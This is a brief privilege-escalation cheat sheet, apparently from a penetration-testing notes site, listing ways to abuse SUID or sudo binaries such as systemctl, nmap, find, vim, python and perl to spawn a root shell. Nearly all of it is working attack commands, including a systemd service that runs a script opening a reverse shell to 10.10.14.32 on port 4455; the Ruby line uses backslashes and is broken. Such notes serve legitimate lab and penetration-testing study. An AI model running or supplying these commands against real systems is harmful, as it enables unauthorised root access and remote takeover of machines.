SUID
How to exploit SUID for the following files
systemctl
echo '[Service]
> Type=oneshot
> User=root
> ExecStart=/bin/bash /home/pepper/getRoot.sh
> [Install]
> WantedBy=multi-user.target' > hack.service
## create getRoot.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.14.32/4455 0>&1
systemctl link /home/pepper/hack.service
systemctl enable --now /home/pepper/hack.service
systemctl start hack.service
Nmap
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
FIND
find . -exec bash -i \;
LESS
v
:shell
MORE
!bash
VIM
!/bin/bash
#or
:shell
PYTHON
>> import os
>> os.system('/bin/bash')
PERL
exec "/bin/bash";
# Ctrl D for EoF
LUA
> os.execute("/bin/bash")
RUBY
exec "\bin\bash"
Last updated
Was this helpful?